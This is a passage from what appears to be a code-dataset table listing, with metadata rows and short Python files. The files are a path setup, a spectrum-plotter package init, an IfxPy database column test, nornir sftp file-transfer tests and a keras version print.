"MIT"
] | 4
|
2021-11-26T02:20:57.000Z
|
2022-01-07T09:47:59.000Z
|
import sys
sys.path.extend(['atari_utils', 'a2c_ppo_acktr'])
sys.path.extend(['../atari_utils', '../a2c_ppo_acktr'])
| 23.6
| 55
| 0.70339
| 18
| 118
| 4.277778
| 0.5
| 0.181818
| 0.337662
| 0.467532
| 0.883117
| 0.883117
| 0.883117
| 0.883117
| 0
| 0
| 0
| 0.018018
| 0.059322
| 118
| 4
| 56
| 29.5
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0.457627
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
5df0b426f175c3fb9b3f15be096d5c28d36be3e3
| 87
|
py
|
Python
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 1
|
2021-11-22T08:45:15.000Z
|
2021-11-22T08:45:15.000Z
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 12
|
2021-11-03T16:36:57.000Z
|
2022-03-21T20:36:44.000Z
|
spectrum_plotter/__init__.py
|
py1sl/spectrum_plotter
|
d49e7cd79c5dad02a5d5a4bcb6ee341067714420
|
[
"MIT"
] | 1
|
2022-03-02T20:16:00.000Z
|
2022-03-02T20:16:00.000Z
|
from .core import plot_spectrum_from_tally
from .core import plot_spectrum_from_values
| 29
| 43
| 0.885057
| 14
| 87
| 5.071429
| 0.5
| 0.225352
| 0.394366
| 0.507042
| 0.84507
| 0.84507
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091954
| 87
| 2
| 44
| 43.5
| 0.898734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
f8df9eb83692414545170c75158e301ed5aabb6e
| 2,244
|
py
|
Python
|
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
IfxPy/tests/test_008_ColumnInfo.py
|
deokershesh/IfxPy
|
7c44a2aea85c115b6f595ffa82c038f660fbf1ad
|
[
"Apache-2.0"
] | null | null | null |
#
#
#
import unittest, sys
import IfxPy
import config
from testfunctions import IfxPyTestFunctions
class IfxPyTestCase(unittest.TestCase):
def test_008_ColumnInfo(self):
obj = IfxPyTestFunctions()
obj.assert_expect(self.run_test_008)
def run_test_008(self):
op = {IfxPy.ATTR_CASE: IfxPy.CASE_NATURAL}
conn = IfxPy.connect(config.ConnStr, config.user, config.password, op)
server = IfxPy.server_info( conn )
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
op = {IfxPy.ATTR_CASE: IfxPy.CASE_UPPER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
op = {IfxPy.ATTR_CASE: IfxPy.CASE_LOWER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
#__END__
#__IDS_EXPECTED__
#employee
#empno
#None
#None
#employee
#empno
#None
#None
#None
#None
#employee
#empno
| 23.134021
| 74
| 0.65107
| 301
| 2,244
| 4.641196
| 0.192691
| 0.042949
| 0.068719
| 0.094488
| 0.727989
| 0.727989
| 0.710809
| 0.710809
| 0.710809
| 0.710809
| 0
| 0.026934
| 0.222371
| 2,244
| 96
| 75
| 23.375
| 0.773639
| 0.038324
| 0
| 0.8
| 0
| 0
| 0.128972
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0
| null | null | 0.014286
| 0.057143
| null | null | 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8f57931d63462ddb0973a18b2579425b67c0375
| 3,232
|
py
|
Python
|
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | 4
|
2020-01-19T16:29:19.000Z
|
2020-12-30T19:25:14.000Z
|
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | null | null | null |
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | 3
|
2018-11-01T18:20:30.000Z
|
2020-04-10T20:12:36.000Z
|
import uuid
# from nornir.core.exceptions import NornirExecutionError, CommandError
from nornir.plugins.tasks import files
# import pytest
def get_file(task):
filename = "/tmp/{uuid}-{host.name}".format(uuid=uuid.uuid4(), host=task.host)
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/hostname", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/hostname", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/hostname", dst=filename
)
assert r
assert not r.changed
def get_directory(task):
filename = "/tmp/{uuid}-{host.name}".format(uuid=uuid.uuid4(), host=task.host)
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert not r.changed
class Test(object):
def test_sftp_put(self, nornir):
u = uuid.uuid4()
result = nornir.run(
files.sftp,
dry_run=True,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp,
dry_run=False,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp,
dry_run=True,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert not r.changed
def test_sftp_get(self, nornir):
result = nornir.run(get_file)
assert not result.failed
def test_sftp_put_directory(self, nornir):
u = uuid.uuid4()
result = nornir.run(
files.sftp, dry_run=True, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp, dry_run=False, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp, dry_run=True, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert not r.changed
def test_sftp_get_directory(self, nornir):
result = nornir.run(get_directory)
assert not result.failed
| 26.276423
| 88
| 0.564047
| 427
| 3,232
| 4.189696
| 0.124122
| 0.054779
| 0.080492
| 0.100615
| 0.857462
| 0.855785
| 0.824483
| 0.824483
| 0.812186
| 0.812186
| 0
| 0.001776
| 0.303218
| 3,232
| 122
| 89
| 26.491803
| 0.792629
| 0.02599
| 0
| 0.715789
| 0
| 0
| 0.092875
| 0.014631
| 0
| 0
| 0
| 0
| 0.273684
| 1
| 0.063158
| false
| 0
| 0.021053
| 0
| 0.094737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d1291c03a4ce04cc0b1eb8bb44083c98ab13569
| 93
|
py
|
Python
|
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
import keras
import pandas
print("keras version:")
print(keras.__version__)
print(pandas)
| 10.333333
| 24
| 0.774194
| 12
| 93
| 5.666667
| 0.416667
| 0.294118
| 0.5
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 93
| 8
| 25
| 11.625
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.150538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.